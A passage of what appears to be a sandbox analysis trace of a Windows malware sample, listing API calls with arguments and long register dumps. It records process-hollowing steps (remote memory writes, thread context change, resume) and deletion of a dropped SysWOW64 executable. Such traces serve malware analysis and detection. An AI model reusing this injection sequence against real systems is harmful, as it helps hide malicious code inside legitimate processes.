[179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x1, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x48, [197]=0xf9, [198]=0x95, [199]=0x1, [200]=0x4, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x3, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x78, [237]=0x3, [238]=0x52, [239]=0x0, [240]=0x3a, [241]=0xf0, [242]=0x52, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x9, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x48, [281]=0xf9, [282]=0x95, [283]=0x1, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x53, [297]=0xa0, [298]=0x33, [299]=0x0, [300]=0x22, [301]=0x0, [302]=0x95, [303]=0x1, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xa0, [309]=0x4, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x4, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xf8, [325]=0xf8, [326]=0x95, [327]=0x1, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x30, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0xec, [345]=0xf7, [346]=0x95, [347]=0x0, [348]=0x78, [349]=0x3, [350]=0x52, [351]=0x0, [352]=0x47, [353]=0x57, [354]=0xd7, [355]=0x0, [356]=0x4, [357]=0x4, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x4f, [379]=0x0, [380]=0x20, [381]=0xf7, [382]=0x95, [383]=0x1, [384]=0x4a, [385]=0x25, [386]=0xd7, [387]=0x76, [388]=0x28, [389]=0x7c, [390]=0x53, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0xff, [397]=0xff, [398]=0xff, [399]=0xff, [400]=0x1f, [401]=0xa0, [402]=0x33, [403]=0xfe, [404]=0xb0, [405]=0xfd, [406]=0x4f, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x9b, [413]=0x25, [414]=0xd7, [415]=0x76, [416]=0x1, [417]=0x0, [418]=0x1, [419]=0x1, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x48, [425]=0xad, [426]=0x4f, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x7a, [433]=0xe4, [434]=0x31, [435]=0x7c, [436]=0xf3, [437]=0x3, [438]=0x0, [439]=0x0, [440]=0x10, [441]=0x4, [442]=0x0, [443]=0x0, [444]=0x38, [445]=0x5, [446]=0x0, [447]=0x0, [448]=0x98, [449]=0x4, [450]=0x0, [451]=0x0, [452]=0x4, [453]=0x4, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x84, [461]=0xad, [462]=0x4f, [463]=0x0, [464]=0x62, [465]=0x42, [466]=0xa7, [467]=0x73, [468]=0x40, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x1, [473]=0x60, [474]=0x0, [475]=0x0, [476]=0xa0, [477]=0x4, [478]=0x0, [479]=0x0, [480]=0x4e, [481]=0x0, [482]=0x50, [483]=0x0, [484]=0x78, [485]=0x3, [486]=0x52, [487]=0x0, [488]=0x56, [489]=0x0, [490]=0x58, [491]=0x0, [492]=0x48, [493]=0xe, [494]=0x59, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0252.147] NtWriteVirtualMemory (in: ProcessHandle=0x3f0, BaseAddress=0x140000000, Buffer=0x20a0000*, NumberOfBytesToWrite=0x22000, NumberOfBytesWritten=0x0 | out: Buffer=0x20a0000*, NumberOfBytesWritten=0x0) returned 0x0 [0252.150] NtWriteVirtualMemory (in: ProcessHandle=0x3f0, BaseAddress=0x7ff6da985010, Buffer=0x195f8b8*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x0 | out: Buffer=0x195f8b8*, NumberOfBytesWritten=0x0) returned 0x0 [0252.150] NtSetContextThread (ThreadHandle=0x410, Context=0x195f380*(ContextFlags=0x0, Dr0=0x195f7d8, Dr1=0x2000, Dr2=0x0, Dr3=0x7754c72c, Dr6=0x0, Dr7=0x195f83c, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x8b050000, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100002, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x27, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x20, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xec, [33]=0xf3, [34]=0x95, [35]=0x1, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xac, [45]=0xf8, [46]=0x95, [47]=0x1, [48]=0xa1, [49]=0xf8, [50]=0x95, [51]=0x1, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x48, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x6, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xc0, [73]=0x61, [74]=0x0, [75]=0x40, [76]=0x1, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xda985000, SegGs=0x7ff6, SegFs=0x0, SegEs=0x0, SegDs=0xda985000, Edi=0x7ff6, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x80, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x68, [69]=0x12, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x60, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x1, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x4f, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x14, [145]=0xff, [146]=0x95, [147]=0x1, [148]=0xf0, [149]=0x7d, [150]=0x5d, [151]=0x0, [152]=0x20, [153]=0xf6, [154]=0x95, [155]=0x1, [156]=0x0, [157]=0x70, [158]=0x50, [159]=0x7f, [160]=0x0, [161]=0xe0, [162]=0xfd, [163]=0x7f, [164]=0x4e, [165]=0x0, [166]=0x50, [167]=0x0, [168]=0x78, [169]=0x3, [170]=0x52, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x9c, [177]=0x4, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x1, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x48, [197]=0xf9, [198]=0x95, [199]=0x1, [200]=0x4, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x3, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x78, [237]=0x3, [238]=0x52, [239]=0x0, [240]=0x3a, [241]=0xf0, [242]=0x52, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x9, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x48, [281]=0xf9, [282]=0x95, [283]=0x1, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x53, [297]=0xa0, [298]=0x33, [299]=0x0, [300]=0x22, [301]=0x0, [302]=0x95, [303]=0x1, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xa0, [309]=0x4, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x4, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xf8, [325]=0xf8, [326]=0x95, [327]=0x1, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x30, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0xec, [345]=0xf7, [346]=0x95, [347]=0x0, [348]=0x78, [349]=0x3, [350]=0x52, [351]=0x0, [352]=0x47, [353]=0x57, [354]=0xd7, [355]=0x0, [356]=0x4, [357]=0x4, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x4f, [379]=0x0, [380]=0x20, [381]=0xf7, [382]=0x95, [383]=0x1, [384]=0x4a, [385]=0x25, [386]=0xd7, [387]=0x76, [388]=0x28, [389]=0x7c, [390]=0x53, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0xff, [397]=0xff, [398]=0xff, [399]=0xff, [400]=0x1f, [401]=0xa0, [402]=0x33, [403]=0xfe, [404]=0xb0, [405]=0xfd, [406]=0x4f, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x9b, [413]=0x25, [414]=0xd7, [415]=0x76, [416]=0x1, [417]=0x0, [418]=0x1, [419]=0x1, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x48, [425]=0xad, [426]=0x4f, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x7a, [433]=0xe4, [434]=0x31, [435]=0x7c, [436]=0xf3, [437]=0x3, [438]=0x0, [439]=0x0, [440]=0x10, [441]=0x4, [442]=0x0, [443]=0x0, [444]=0x38, [445]=0x5, [446]=0x0, [447]=0x0, [448]=0x98, [449]=0x4, [450]=0x0, [451]=0x0, [452]=0x4, [453]=0x4, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x84, [461]=0xad, [462]=0x4f, [463]=0x0, [464]=0x62, [465]=0x42, [466]=0xa7, [467]=0x73, [468]=0x40, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x1, [473]=0x60, [474]=0x0, [475]=0x0, [476]=0xa0, [477]=0x4, [478]=0x0, [479]=0x0, [480]=0x4e, [481]=0x0, [482]=0x50, [483]=0x0, [484]=0x78, [485]=0x3, [486]=0x52, [487]=0x0, [488]=0x56, [489]=0x0, [490]=0x58, [491]=0x0, [492]=0x48, [493]=0xe, [494]=0x59, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0252.150] ResumeThread (hThread=0x410) returned 0x1 [0252.150] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0x493e0) returned 0x0 [0296.018] TerminateProcess (hProcess=0x3f0, uExitCode=0x0) returned 0 [0296.019] WaitForSingleObject (hHandle=0x3f0, dwMilliseconds=0xea60) returned 0x0 [0296.019] CloseHandle (hObject=0x3f0) returned 1 [0296.019] CloseHandle (hObject=0x410) returned 1 [0296.019] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutralb.exe" (normalized: "c:\\windows\\syswow64\\indexerneutralb.exe")) returned 1 [0296.020] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0296.020] CloseHandle (hObject=0x0) returned 0 [0296.020] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0296.020] CreateFileW (lpFileName="C:\\Windows\\TEMP\\3267.tmp" (normalized: "c:\\windows\\temp\\3267.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0296.021] GetFileSize (in: hFile=0x410, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0296.021] CloseHandle (hObject=0x410) returned 1 [0296.021] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3267.tmp" (normalized: "c:\\windows\\temp\\3267.tmp")) returned 1 [0296.021] CryptDestroyHash (hHash=0x513968) returned 1 [0296.021] CryptDestroyKey (hKey=0x5137e8) returned 1 [0296.021] CryptDestroyKey (hKey=0x513a28) returned 1 [0296.021] CryptReleaseContext (hProv=0x52ecc0, dwFlags=0x0) returned 1 [0296.021] FreeLibrary (hLibModule=0x760f0000) returned 1 [0296.021] FreeLibrary (hLibModule=0x77130000) returned 1 [0296.021] FreeLibrary (hLibModule=0x74790000) returned 1 [0296.021] FreeLibrary (hLibModule=0x74450000) returned 1 [0296.021] FreeLibrary (hLibModule=0x74160000) returned 1 [0296.021] FreeLibrary (hLibModule=0x73f30000) returned 1 [0296.021] FreeLibrary (hLibModule=0x73f20000) returned 1 [0296.021] CloseHandle (hObject=0x3a4) returned 1 Thread: id = 510 os_tid = 0x7d0 [0249.604] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0249.605] LoadLibraryW (lpLibFileName="mpr.dll") returned 0x73a40000 [0249.780] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x73a20000 [0250.408] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0250.408] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0250.408] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x404 [0250.409] GetTickCount () returned 0x13592 [0250.409] CreateTimerQueueTimer (in: phNewTimer=0x1a9ff58, TimerQueue=0x0, Callback=0xb144f0, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x1a9ff58*=0x5139a8) returned 1 [0250.409] WaitForSingleObject (hHandle=0x404, dwMilliseconds=0xffffffff) returned 0x0 [0276.850] DeleteTimerQueueTimer (TimerQueue=0x0, Timer=0x5139a8, CompletionEvent=0xffffffff) returned 1 [0276.850] CloseHandle (hObject=0x404) returned 1 Thread: id = 511 os_tid = 0x7d4 [0250.409] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1c7ff54 | out: lpSystemTimeAsFileTime=0x1c7ff54*(dwLowDateTime=0x7b69aa92, dwHighDateTime=0x1d4d52e)) [0250.409] GetCurrentThreadId () returned 0x7d4 [0250.409] GetCurrentProcessId () returned 0x6cc [0250.409] QueryPerformanceCounter (in: lpPerformanceCount=0x1c7ff4c | out: lpPerformanceCount=0x1c7ff4c*=7928789758) returned 1 [0250.410] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x765f0000 [0250.410] GetProcAddress (hModule=0x765f0000, lpProcName="FlsAlloc") returned 0x7660a330 [0250.410] GetProcAddress (hModule=0x765f0000, lpProcName="FlsFree") returned 0x7660f400 [0250.410] GetProcAddress (hModule=0x765f0000, lpProcName="FlsGetValue") returned 0x76607580 [0250.412] GetProcAddress (hModule=0x765f0000, lpProcName="FlsSetValue") returned 0x76609910 [0250.412] GetProcAddress (hModule=0x765f0000, lpProcName="InitializeCriticalSectionEx") returned 0x76616030 [0250.412] GetProcAddress (hModule=0x765f0000, lpProcName="CreateEventExW") returned 0x76615f90 [0250.412] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSemaphoreExW") returned 0x76615ff0 [0250.413] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadStackGuarantee") returned 0x7660a5d0 [0250.413] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolTimer") returned 0x7660a690 [0250.413] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolTimer") returned 0x775440f0 [0250.413] GetProcAddress (hModule=0x765f0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7753d630 [0250.413] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolTimer") returned 0x7753ecf0 [0250.414] GetProcAddress (hModule=0x765f0000, lpProcName="CreateThreadpoolWait") returned 0x76615720 [0250.414] GetProcAddress (hModule=0x765f0000, lpProcName="SetThreadpoolWait") returned 0x7753e140 [0250.414] GetProcAddress (hModule=0x765f0000, lpProcName="CloseThreadpoolWait") returned 0x7753eb60 [0250.414] GetProcAddress (hModule=0x765f0000, lpProcName="FlushProcessWriteBuffers") returned 0x77579990 [0250.414] GetProcAddress (hModule=0x765f0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77575540 [0250.415] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentProcessorNumber") returned 0x77569dc0 [0250.415] GetProcAddress (hModule=0x765f0000, lpProcName="GetLogicalProcessorInformation") returned 0x7660a550 [0250.415] GetProcAddress (hModule=0x765f0000, lpProcName="CreateSymbolicLinkW") returned 0x76630a40 [0250.415] GetProcAddress (hModule=0x765f0000, lpProcName="SetDefaultDllDirectories") returned 0x76450790 [0250.415] GetProcAddress (hModule=0x765f0000, lpProcName="EnumSystemLocalesEx") returned 0x7660f8a0 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="CompareStringEx") returned 0x7660fa30 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="GetDateFormatEx") returned 0x76631030 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="GetLocaleInfoEx") returned 0x7660a000 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="GetTimeFormatEx") returned 0x766314b0 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="GetUserDefaultLocaleName") returned 0x7660a4f0 [0250.416] GetProcAddress (hModule=0x765f0000, lpProcName="IsValidLocaleName") returned 0x766316f0 [0250.417] GetProcAddress (hModule=0x765f0000, lpProcName="LCMapStringEx") returned 0x76609970 [0250.417] GetProcAddress (hModule=0x765f0000, lpProcName="GetCurrentPackageId") returned 0x763d3c90 [0250.417] GetProcAddress (hModule=0x765f0000, lpProcName="GetTickCount64") returned 0x76608710 [0250.417] GetProcAddress (hModule=0x765f0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0250.417] GetProcAddress (hModule=0x765f0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0250.418] GetCurrentThreadId () returned 0x7d4 [0250.418] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"" [0250.418] GetEnvironmentStringsW () returned 0x536bf0* [0250.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1355 [0250.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1355, lpMultiByteStr=0x537690, cbMultiByte=1355, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1355 [0250.418] FreeEnvironmentStringsW (penv=0x536bf0) returned 1 [0250.418] GetStartupInfoW (in: lpStartupInfo=0x1c7fe70 | out: lpStartupInfo=0x1c7fe70*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x7754c72c, hStdOutput=0x0, hStdError=0x1aaa889)) [0250.418] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0250.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0250.418] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0250.418] GetLastError () returned 0x7f [0250.418] SetLastError (dwErrCode=0x7f) [0250.418] GetLastError () returned 0x7f [0250.418] SetLastError (dwErrCode=0x7f) [0250.419] GetLastError () returned 0x7f [0250.419] SetLastError (dwErrCode=0x7f) [0250.419] GetACP () returned 0x4e4 [0250.419] GetLastError () returned 0x7f [0250.419] SetLastError (dwErrCode=0x7f) [0250.419] IsValidCodePage (CodePage=0x4e4) returned 1 [0250.419] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1c7fe74 | out: lpCPInfo=0x1c7fe74) returned 1 [0250.419] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1c7f93c | out: lpCPInfo=0x1c7f93c) returned 1 [0250.419] GetLastError () returned 0x7f [0250.419] SetLastError (dwErrCode=0x7f) [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x1c7f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.419] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x1c7f950 | out: lpCharType=0x1c7f950) returned 1 [0250.419] GetLastError () returned 0x7f [0250.419] SetLastError (dwErrCode=0x7f) [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1c7fd50, cbMultiByte=256, lpWideCharStr=0x1c7f688, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0250.419] LCMapStringEx (in: 